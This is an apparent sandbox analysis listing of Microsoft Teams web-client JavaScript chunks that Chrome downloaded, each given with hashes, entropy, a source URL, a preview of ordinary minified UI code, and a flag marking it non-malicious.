                                                                                                                                                                                                                                                                            SHA-256:5F8C06DB885B08B2183DAFC11A2B851D897695DFD1F8576BB7893859BC7DE105
                                                                                                                                                                                                                                                                            SHA-512:25967EF3FFB1608B53394390C8A7B795D2462CEE6F09DEB0F8CFF6859CE79526AD612F3ED36F4800CD2819FCD769A6098648D7A981CE48D4DA3443DEA510467E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/96611-fac52880239025ab.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[96611],{306766:(e,n,t)=>{t.d(n,{u$:()=>i,EY:()=>a,wu:()=>o,fS:()=>l,Xd:()=>r,Zb:()=>s,vT:()=>d});var i,a,o,l,r,s,d;!function(e){e.SingleWindowExperience="single-window-experience",e.MultiWindowExperience="multi-window-experience"}(i||(i={})),function(e){e.NavigatePromiseBiMError="navigate-promise-bim-error",e.DuplicateScenarioCreation="duplicate-scenario-creation",e.IntentIdUndefined="intent-id-undefined"}(a||(a={})),function(e){e.ScenarioNotFound="scenario-not-found",e.IntentNotFoundForCallingWindowingIntentId="intent-not-found-for-calling-windowing-intent-id",e.ContainerNotFoundForCallingWindowingIntentId="container-not-found-for-calling-windowing-intent-id",e.InvalidUpdateType="invalid-update-type",e.ContainerRenderFailed="container-render-failed"}(o||(o={})),function(e){e.CloseContainerFailed="close-container-failed",e.CloseContainerTimeout="close-container-timeout",e.Int
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (47805)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):47913
                                                                                                                                                                                                                                                                            Entropy (8bit):5.382366921986537
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:SUpJLd/iN3A5JewIE2c4mF4CJKtD50g+SaranNE3DjeKH1b:ZLdmKpIEtr9gqranu3DqKH1b
                                                                                                                                                                                                                                                                            MD5:334DDD74DD7F780C7829E4EAC83CDFF6
                                                                                                                                                                                                                                                                            SHA1:0993A41A48093AFCB5F82C25F43AE6A7279EC815
                                                                                                                                                                                                                                                                            SHA-256:7742AE0803C92EEEDCA7F31AE73A7CAF0D53AEE1A5553FCF633414B1D1AE22CE
                                                                                                                                                                                                                                                                            SHA-512:8D863E8319BD9B583C767104A8DD88B846D0B8D01892C7D3DBC3CA7FBBB5BF026F17CBB83767FBD4B183AE555C74B3F141C86519AF9B2AAB3A9ED1FB45E6D0C1
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[192699],{504405:(e,t,n)=>{n.d(t,{P:()=>r,C:()=>o});var r="data-is-focusable",o="data-disable-click-on-enter"},888846:(e,t,n)=>{n.d(t,{l:()=>r,E:()=>o});var r=function(e){return e[e.none=0]="none",e[e.all=1]="all",e[e.inputOnly=2]="inputOnly",e}({}),o=function(e){return e[e.vertical=0]="vertical",e[e.horizontal=1]="horizontal",e[e.bidirectional=2]="bidirectional",e[e.bidirectionalDomOrder=3]="bidirectionalDomOrder",e}({})},953543:(e,t,n)=>{n.d(t,{kR:()=>f,ZG:()=>c,QC:()=>i,rC:()=>s});var r={3:"Cancel",6:"Help",8:"Backspace",9:"Tab",12:"Clear",13:"Enter",16:"Shift",17:"Control",18:"Alt",19:"Pause",20:"CapsLock",27:"Escape",28:"Convert",29:"NonConvert",30:"Accept",31:"ModeChange",32:" ",33:"PageUp",34:"PageDown",35:"End",36:"Home",37:"ArrowLeft",38:"ArrowUp",39:"ArrowRight",40:"ArrowDown",41:"Select",42:"Print",43:"Execute",44:"PrintScreen",45:"Insert",46:"Delete",48:["0",")"],4
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (37953)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):38061
                                                                                                                                                                                                                                                                            Entropy (8bit):5.448293239314431
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:XDmCE8lrGpISt/mliGc0obeleSDJSW4w6FaLjnpOREBIDEvVFNxWjbj9fbNQSgnQ:6G8JRkclLxEp0gnEeAB3/CTupMdhK9xJ
                                                                                                                                                                                                                                                                            MD5:A117538BF4047A2E645A137E3AC4BD11
                                                                                                                                                                                                                                                                            SHA1:2FB8F07C150934A27009BED3F125EFECED790231
                                                                                                                                                                                                                                                                            SHA-256:A5F88D747B353551482930D73E54AC628E3FC34D503D9357F033DE8A33573FD3
                                                                                                                                                                                                                                                                            SHA-512:BB8442EA5CDE7C347B166110E804537F1ABF656A386E421DF1849768FE35F6FB13D3E9545151D192B8761EAEE6B9CBEDF36663526A3C4872794CD282DFC71E4E
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/762949-f9ce84904963ca10.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[762949],{478990:(e,t,n)=>{n.d(t,{e:()=>s});var a=n(35158);function s(e,t,n,s,i,o){const{fragmentName:r,fragmentTypeName:d,fragment:c}=(0,a.LT)(n);try{const n=`${d}:${t}`,a=e.readFragment({id:n,fragment:c,fragmentName:r});e.writeFragment({id:n,fragment:c,fragmentName:r,data:{...a,crossPostStatus:s,crossPostFailedChannels:i}})}catch(e){o.error(`updatePostWithCrossPostStatus: Failed writing failure status to cache for post with id: ${t}`)}}},574211:(e,t,n)=>{n.d(t,{u:()=>a});const a=e=>!!e&&-1!==["jpg","jpeg","png","gif"].indexOf(e)},581945:(e,t,n)=>{n.d(t,{W:()=>i});var a=n(362328),s=n(780706);const i={kind:"Document",get definitions(){const e=(0,a.G)("fragment ComponentsChatPaneSharedAppDefinitionFragment on AppDefinition {id,name,bots {...botDefinition},largeImageUrl}");return delete this.definitions,this.definitions=[...e.definitions,...s.x.definitions]}}},971225:(e,t,n)=>{n
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (30489)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):30597
                                                                                                                                                                                                                                                                            Entropy (8bit):5.36114233090183
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:J+fPoXF4ikn1Fd9nZTBJCda5tgMRillf5xeO55XqqRCRWtcNH4oYJF:KW6U8TwAQb
                                                                                                                                                                                                                                                                            MD5:B34B6A1930919E2D8AD388FEA65E6E64
                                                                                                                                                                                                                                                                            SHA1:F43E4975CFE5BEA3EB9298FEBC37BCB333582026
                                                                                                                                                                                                                                                                            SHA-256:97E8A6EA62E0062C54C0D755509DD5F9ACF2C4C41297170AC361EDF1FD882D43
                                                                                                                                                                                                                                                                            SHA-512:2B0C9CF798816C5ECDD5CF056130EAA4ED4D5AA4C92A341A43C35B788EEF9C0FFC3C876C28A9D96A97BA6FE1C96A7FAF403B95C69665CF6D578C28F2A02676AE
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[233940],{626388:(e,t,r)=>{var n;function o(e){return!!e&&e<7}r.d(t,{p:()=>n,b:()=>o}),function(e){e[e.loading=1]="loading",e[e.setVariables=2]="setVariables",e[e.fetchMore=3]="fetchMore",e[e.refetch=4]="refetch",e[e.poll=6]="poll",e[e.ready=7]="ready",e[e.error=8]="error"}(n||(n={}))},422816:(e,t,r)=>{r.d(t,{M:()=>i,K:()=>s});var n=r(383851),o=(r(360418),r(852965));function i(e){return e.hasOwnProperty("graphQLErrors")}var s=function(e){function t(r){var n,i,s=r.graphQLErrors,a=r.clientErrors,c=r.networkError,u=r.errorMessage,l=r.extraInfo,d=e.call(this,u)||this;return d.graphQLErrors=s||[],d.clientErrors=a||[],d.networkError=c||null,d.message=u||(n=d,i="",((0,o.E)(n.graphQLErrors)||(0,o.E)(n.clientErrors))&&(n.graphQLErrors||[]).concat(n.clientErrors||[]).forEach((function(e){var t=e?e.message:"Error message not found.";i+="".concat(t,"\n")})),n.networkError&&(i+="".concat(n
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:Unicode text, UTF-8 text, with very long lines (41662)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):41778
                                                                                                                                                                                                                                                                            Entropy (8bit):5.360363617158387
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:gpYFYfTpWdL/In2MB1TU6EIQRNrPzaNfrfAxETtp27EFF9V9LfiTXIDLJqoGBwr:gpkYfId4D0ExYoFfiTXkFq7a
                                                                                                                                                                                                                                                                            MD5:38B448E73F0207EDB8A49DA72943D515
                                                                                                                                                                                                                                                                            SHA1:4B761C3BD552A524946DDEBEF41D392E4606EC14
                                                                                                                                                                                                                                                                            SHA-256:019D358A1E21F5B6F1FDE5482EEEF12051D85E374A48A35559108FC1FD3920F1
                                                                                                                                                                                                                                                                            SHA-512:2F5F3245B57FCAFC06A3CA95D068A60A28A94861A821B3E1DADC3EA6D3C134F0B6BF472B27683D01F66DB53BB921C3D6D318029D3865CC7E74808E254D028D2C
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/204348-6c2a726c296c1d1e.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[204348],{941974:t=>{t.exports=function(t,e){if(!(t instanceof e))throw new TypeError("Cannot call a class as a function")},t.exports.__esModule=!0,t.exports.default=t.exports},749712:t=>{function e(t,e){for(var i=0;i<e.length;i++){var n=e[i];n.enumerable=n.enumerable||!1,n.configurable=!0,"value"in n&&(n.writable=!0),Object.defineProperty(t,n.key,n)}}t.exports=function(t,i,n){return i&&e(t.prototype,i),n&&e(t,n),Object.defineProperty(t,"prototype",{writable:!1}),t},t.exports.__esModule=!0,t.exports.default=t.exports},238752:t=>{t.exports=function(t,e,i){return e in t?Object.defineProperty(t,e,{value:i,enumerable:!0,configurable:!0,writable:!0}):t[e]=i,t},t.exports.__esModule=!0,t.exports.default=t.exports},434192:(t,e,i)=>{var n=i(71012);t.exports=function(t,e){if(null==t)return{};var i,r,o=n(t,e);if(Object.getOwnPropertySymbols){var s=Object.getOwnPropertySymbols(t);for(r=0;r<s.length;r+
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (3666)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):3774
                                                                                                                                                                                                                                                                            Entropy (8bit):5.548756589394929
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:HGRm7M6x8TOsdyjLi+i2+iX334q269Q3WOpTiW03f:HGRm7M6mTOLi3WNQ3VixP
                                                                                                                                                                                                                                                                            MD5:67B134A86A1BED63678A879F6C3B59A0
                                                                                                                                                                                                                                                                            SHA1:6B8D7926C3D55680EAE35CA01B79852F46378890
                                                                                                                                                                                                                                                                            SHA-256:FF6874070AE590ED1317FE686388DD599E44B646715E3B6A9621C388490C28A5
                                                                                                                                                                                                                                                                            SHA-512:82FAB2F7E52337E653466F1BF3DC1D5A9A802AAE9CA83D21224F9F01A8BA11441262CE413A86FCD946EBC0D68F8405AB0947FB778EB42269D5FE67057125CC77
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[699899],{699899:(e,t,n)=>{n.d(t,{BM:()=>N,Ps:()=>T,kJ:()=>I});var r=n(189687),i=n(425104);n(296920),n(132786);const a=e=>e%4==0&&e%100!=0||e%400==0,s=e=>/^([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9])(\.\d{1,})?(([Z])|([+|-]([01][0-9]|2[0-3]):[0-5][0-9]))$/.test(e),o=e=>{if(!/^(\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01]))$/.test(e))return!1;const t=Number(e.substr(0,4)),n=Number(e.substr(5,2)),r=Number(e.substr(8,2));switch(n){case 2:return!(a(t)&&r>29)&&!(!a(t)&&r>28);case 4:case 6:case 9:case 11:if(r>30)return!1}return!0},c=e=>{if(!/^(\d{4}-(0[1-9]|1[012])-(0[1-9]|[12][0-9]|3[01])T([01][0-9]|2[0-3]):([0-5][0-9]):([0-5][0-9]|60))(\.\d{1,})?(([Z])|([+|-]([01][0-9]|2[0-3]):[0-5][0-9]))$/.test(e))return!1;const t=Date.parse(e);if(t!=t)return!1;const n=e.indexOf("T"),r=e.substr(0,n),i=e.substr(n+1);return o(r)&&s(i)},u=e=>{const t=e.getTime();return t==t},p=e=>new Date(e),l={n
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (4986)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):5094
                                                                                                                                                                                                                                                                            Entropy (8bit):5.51636181102733
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:96:zpBCu/dgCYkjwLiTSbTkiwO1z7zFrbl4tZDrEshgPgEeLQM/YLFu4a:zpmmjwLiTSbTkiF5PKDrEVIEeUUYxun
                                                                                                                                                                                                                                                                            MD5:B65450E5E3BDED5E0DF059CF41E27EF8
                                                                                                                                                                                                                                                                            SHA1:C5A12EAF609A083B7542CD3AC429E550665CAB53
                                                                                                                                                                                                                                                                            SHA-256:8AE92D7478043DA693389A9C139FCDBE4FED242CD318BB10EB645BF0F4DCD548
                                                                                                                                                                                                                                                                            SHA-512:051B0BCD140770FF42CCD224F4905CFA55422008AB5DA3A714C469CD4BFB9B3D61017FCAB41AA57635E74325D7439E560E171CE562503A9B4D3F88B57B58089F
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/986559-4ca7a71999c4c275.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[986559],{926751:(e,n,t)=>{var r;t.d(n,{B:()=>r}),function(e){e.AuthFailed="AuthFailed",e.AuthResolveFailed="AuthResolveFailed",e.BaseUrlFailedToResolve="BaseUrlFailedToResolve",e.BaseUrlTimeout="BaseUrlTimeout",e.CustomTelemetryFailed="CustomTelemetryFailed",e.FailedToFetch="FailedToFetch",e.InvalidCancellationToken="InvalidCancellationToken",e.InvalidParameters="Invalid pararameters",e.InvalidUrl="InvalidUrl",e.ModelFailedToInitialize="ModelFailedToInitialize",e.ModelTimeOut="ModelTimeOut",e.NotImplemented="NotImplemented",e.RejectHttpError="RejectHttpError",e.RequestCancelled="RequestCancelled",e.RequireStatusFailed="RequireStatusFailed",e.TimedOut="TimedOut",e.TransformFailed="TransformFailed"}(r||(r={}))},72909:(e,n,t)=>{function r(e){return new Promise(((n,t)=>{e<0?t(new Error("negative timeout")):setTimeout(n,e)}))}t.d(n,{y:()=>r})},355515:(e,n,t)=>{t.d(n,{GQ:()=>o,E2:(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (29731)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):29839
                                                                                                                                                                                                                                                                            Entropy (8bit):5.480286659693982
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:lgcQt/jMPwaQOaPC8Hs/lsCyKhoXH+qbdGerTRs5FPCnjKcKzRyDK7hbX00SH6PK:lgHf//BCKhGTA/t
                                                                                                                                                                                                                                                                            MD5:A7D47B96F7C26B98109550B98CF55B6E
                                                                                                                                                                                                                                                                            SHA1:FF4101EFBC90EBE5C37FA6091A40F4E753D892AB
                                                                                                                                                                                                                                                                            SHA-256:FF20B9DA1DBDF4B95C1F06CE5AF06075DF5701B6649D970A7C27AED8B902E45F
                                                                                                                                                                                                                                                                            SHA-512:D177390748499D6E321085F9F10FCFD524FF13940F31BA4D38011CB2B2C6F025EBC2CE6DCCAB2060AF2C5E1C083B7C90FEDE8FEF7C4635C465F506E441A0B418
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/932549-c7ef1a597d32507c.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[932549,769268,657634],{998783:(e,t,n)=>{n.d(t,{S:()=>F});var r=n(513432),o=n(733071),a=n(589256),i=n(531389),l=n(411947),s=n(164093),c=n(602835),u=n(478304),d=n(716300),f=n(750818),v=n(119068),p=n(499319),m=n(483851),g=n(762612);var b=n(644525),h=n(854130);var y=n(103735),B=n(965804),w=n(526521);const k="fui-Checkbox",q="fui-Checkbox__label",j="fui-Checkbox__input",z="fui-Checkbox__indicator",x=(0,y.D)("r1q22k1j","r18ze4k2"),D=(0,B.O)({unchecked:{Bi91k9c:"f3p8bqa",pv5h1i:"fium13f",lj723h:"f1r2dosr",Hnthvo:"f1729es6"},checked:{sj55zd:"f19n0e5",wkncrt:"f35ds98",zxk7z7:"f12mnkne",Hmsnfy:"fei9a8h",e6czan:"fix56y3",pv5h1i:"f1bcv2js",qbydtz:"f7dr4go",Hnthvo:"f1r5cpua"},mixed:{sj55zd:"f19n0e5",Hmsnfy:"f1l27tf0",zxk7z7:"fcilktj",pv5h1i:"f1lphd54",Bunfa6h:"f1obkvq7",Hnthvo:"f2gmbuh",B15ykmv:"f1oy4fa1"},disabled:{Bceei9c:"f158kwzp",sj55zd:"f1s2aq7o",Hmsnfy:"f1w7mfl5",zxk7z7:"fcoafq6",B
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (33656)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):33764
                                                                                                                                                                                                                                                                            Entropy (8bit):5.60156438987075
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:uaEXiN3NpnQ2o+H7RyZTG76kQ3vIJ7lulJbjlNUXM0PSro5h/mF0nDS9w7fv/hxj:uKN3NpnQ2oY8pG7G3vabDJj0zytd
                                                                                                                                                                                                                                                                            MD5:D010EF6AEC4927AB3BB5049C00D70842
                                                                                                                                                                                                                                                                            SHA1:9D23110792583AAF46063E62006CFF812A81549A
                                                                                                                                                                                                                                                                            SHA-256:9FF10088E9376E32B8657F7B51092829F068D89B65B8AF472AF59C87A82DD68A
                                                                                                                                                                                                                                                                            SHA-512:243BE3C3E79BE17165A2B7561E8534997DD57B9B04E314544965378CA1BC4E01F0BDFA8A5AD63C3F67D7F2DD724F775ABDD55B0D9F082FDFD5969C5514854081
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/900516-ca863ef1d4e5aa90.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[900516],{111631:(e,t,r)=>{function i(e,t){var r=t&&t.cache?t.cache:l,i=t&&t.serializer?t.serializer:u;return(t&&t.strategy?t.strategy:a)(e,{cache:r,serializer:i})}function n(e,t,r,i){var n,s=null==(n=i)||"number"==typeof n||"boolean"==typeof n?i:r(i),o=t.get(s);return void 0===o&&(o=e.call(this,i),t.set(s,o)),o}function s(e,t,r){var i=Array.prototype.slice.call(arguments,3),n=r(i),s=t.get(n);return void 0===s&&(s=e.apply(this,i),t.set(n,s)),s}function o(e,t,r,i,n){return r.bind(t,e,i,n)}function a(e,t){return o(e,this,1===e.length?n:s,t.cache.create(),t.serializer)}r.d(t,{A:()=>i,W:()=>h});var u=function(){return JSON.stringify(arguments)};function c(){this.cache=Object.create(null)}c.prototype.get=function(e){return this.cache[e]},c.prototype.set=function(e,t){this.cache[e]=t};var l={create:function(){return new c}},h={variadic:function(e,t){return o(e,this,s,t.cache.create(
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (18896)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):19004
                                                                                                                                                                                                                                                                            Entropy (8bit):5.306974413145656
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:384:G4AQE0IXIfeJgWCljWwXS+YuD/CEz5p+ZExpUZKVDziCzxA5R2qe9RoqrS:u0lWCrD/CEdHi9PT
                                                                                                                                                                                                                                                                            MD5:C685FFC1C5CE457B25393165744C7D08
                                                                                                                                                                                                                                                                            SHA1:6469598AEFA52571D810FF03E52F00676D8C4F6D
                                                                                                                                                                                                                                                                            SHA-256:686C2F561FFC20EB44E792F2F5F477409B029F2F4AEB7EF832E211AFB1691F62
                                                                                                                                                                                                                                                                            SHA-512:FE85EEB7E62B7ECE8192FFD481C93CBBB80CC2C3E135F8EEB8E40E07FC605DE831C028F9EDBCA0304B351169347426A63FC6015C4E637CE46ED32B302A0DC273
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/534940-f1c535e0c8723100.js
                                                                                                                                                                                                                                                                            Preview:"use strict";(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[534940],{796767:(e,t,n)=>{n.d(t,{S:()=>i});var a=n(953543),r=n(504405),i=function(e){var t;return{attributes:{wrapper:{role:"presentation","data-tabs":"true"},root:(t={role:"tab",tabIndex:0,"aria-selected":!!e.active,"aria-label":e["aria-label"],"aria-labelledby":e["aria-labelledby"],"aria-describedby":e["aria-describedby"],"aria-controls":e["aria-controls"],"aria-disabled":e.disabled},t[r.P]=!0,t)},keyActions:{root:{performClick:{keyCombinations:[{keyCode:a.rC.Enter},{keyCode:a.ZG}]}}}}}},584667:(e,t,n)=>{n.d(t,{G:()=>i});var a=n(888846),r=n(796767),i=function(){return{attributes:{root:{role:"tablist"}},focusZone:{props:{shouldFocusInnerElementWhenReceivedFocus:!0,direction:a.E.bidirectionalDomOrder}},childBehaviors:{item:r.S}}}},510533:(e,t,n)=>{n.d(t,{FN:()=>G,ih:()=>H,LA:()=>D});var a=n(112882),r=n.n(a),i=n(109161),o=n.n(i),s=n(936666),l=n(953543),c=function(e){return{att
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (56925)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):57033
                                                                                                                                                                                                                                                                            Entropy (8bit):5.526684249472521
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:GkxxRkotyP4Iu7O2nVb+uwhZc8UYwV7/Lohypjw3LzMjHeNVZPFO9/L3/kbplZhw:GuxRkooe8U7xoMpsN+wNF7h+R35xwwv
                                                                                                                                                                                                                                                                            MD5:F7BC86C2B86C34A3986592D49901F84E
                                                                                                                                                                                                                                                                            SHA1:C8D46651B56797D52A53B8BC662EEBE9B2A69CE0
                                                                                                                                                                                                                                                                            SHA-256:5026CAE4341809EA98DE562F605491D577C97FB7B475A84F797FE10B5C36875E
                                                                                                                                                                                                                                                                            SHA-512:B9180A875C20B0DD395405B62041E479132C2CADEAEABB041EEE06CDD5415ED2B1C76409561F177AD36110C646710A6A051FBEB24271DBB4E717E8EDBCF35D30
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/336776-b73125696b681791.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[336776],{911717:(e,t,n)=>{"use strict";n.d(t,{w:()=>r});var a=n(783148);class r{constructor(e,t){this.value=e,this.piiKind=t}static isPIIValue(e){return!!e&&"string"!=typeof e&&void 0!==e.scrub}scrub(){return(0,a.sha256)(JSON.stringify(this.value))}}},276201:(e,t,n)=>{"use strict";n.d(t,{$:()=>r});var a=n(34655);function r(e){if(!e||"object"!=typeof e)return!1;if("RegionGtmNotFoundInRespone"===e.errorCode)return!0;const t=e;return t.code===a.O4.InvalidResponse&&"Discover"===t.context&&"regionGtm"===t.subContext}},396949:(e,t,n)=>{"use strict";var a,r;n.d(t,{I:()=>a}),function(e){e[e.BT_STOP=0]="BT_STOP",e[e.BT_STOP_BASE=1]="BT_STOP_BASE",e[e.BT_BOOL=2]="BT_BOOL",e[e.BT_UINT8=3]="BT_UINT8",e[e.BT_UINT16=4]="BT_UINT16",e[e.BT_UINT32=5]="BT_UINT32",e[e.BT_UINT64=6]="BT_UINT64",e[e.BT_FLOAT=7]="BT_FLOAT",e[e.BT_DOUBLE=8]="BT_DOUBLE",e[e.BT_STRING=9]="BT_STRING",e[e.BT_STRUCT=10]="BT_STRUCT",e
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (51711)
                                                                                                                                                                                                                                                                            Category:downloaded
                                                                                                                                                                                                                                                                            Size (bytes):51819
                                                                                                                                                                                                                                                                            Entropy (8bit):5.396916250619922
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:ejcrcWCLys9Pod8X5cceHZGbckMnXd1c5xcVJkyOz42syyPMVb2+vvDWLIFKmK6:LeljdZWydVSlmh
                                                                                                                                                                                                                                                                            MD5:E9BAFB2820BC7922B44E12BCD523B1D1
                                                                                                                                                                                                                                                                            SHA1:BEA7DDF3E853CE508AAC415553BCE6E7635F6A23
                                                                                                                                                                                                                                                                            SHA-256:A995D7E16B5D4549A94E28CAFC569E140431135922F410C1965B5EE80353F007
                                                                                                                                                                                                                                                                            SHA-512:11303050E451CC318A7F6CAD193595A20330B093A71566E0DB92CBCF58CFF55CB52A70170FD4D8C0F9A2E41D162E3F06BE3A94F8DBB2C6119C2F7D101FDB33CE
                                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                                            URL:https://statics.teams.cdn.office.net/teams-modular-packages/hashed-assets/616161-320ea2e58c4a17c9.js
                                                                                                                                                                                                                                                                            Preview:(this.webpackChunk_msteams_react_web_client=this.webpackChunk_msteams_react_web_client||[]).push([[616161],{333890:(e,r,t)=>{"use strict";t.d(r,{P:()=>o});var n=t(746548),a=t(513432),o=a.createContext((0,n.c)())},155259:(e,r,t)=>{"use strict";t.d(r,{Y:()=>n});var n=function(){function e(){this.performance=void 0,this.enabled=void 0,this.performance={},this.enabled=!0}return e.prototype.reset=function(){this.performance={}},e}()},746548:(e,r,t)=>{"use strict";t.d(r,{c:()=>lr});var n=t(640901),a=t.n(n),o=t(848949),i=t(828770),s=t.n(i),c=t(49102);function u(e,r,t){var n=arguments.length>3&&void 0!==arguments[3]?arguments[3]:{};return e.plugins.length>0?(0,c.A)(e.plugins,(function(r,a){return a(r,t,e,n)}),r):r}var l="RULE",f="KEYFRAME",d="FONT",p="STATIC",h="CLEAR",v=/^(:|\[|>|&)/;function g(e){return v.test(e)}function m(e){return"&"===e.charAt(0)?e.slice(1):e}function b(e){return"@media"===e.substr(0,6)}function y(e,r){return 0===e.length?r:e+" and "+r}function A(e){return"@supports"===e
                                                                                                                                                                                                                                                                            Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (48765)
                                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                                            Size (bytes):48873
                                                                                                                                                                                                                                                                            Entropy (8bit):5.585752148083214
                                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                                            SSDEEP:768:p06I3vBPzL+0nyD9dq80ijv+SrLySSwTy27x2TiosDmp1s7HUhQGOp58dM8++3NJ:y5nOqQhqsTuk8+kqRmn8A3
                                                                                                                                                                                                                                                                            MD5:C9D09D37639FC20B3B1FD87A64E94E3E
                                                                                                                                                                                                                                                                            SHA1:E3B248AA3D8D9740E9538A66DC667CD8495492EA
                                                                                                                                                                                                                                                                            SHA-256:EACE750A63245218251A76104B17B464095CFB1790D5F4412CD63790030580B6
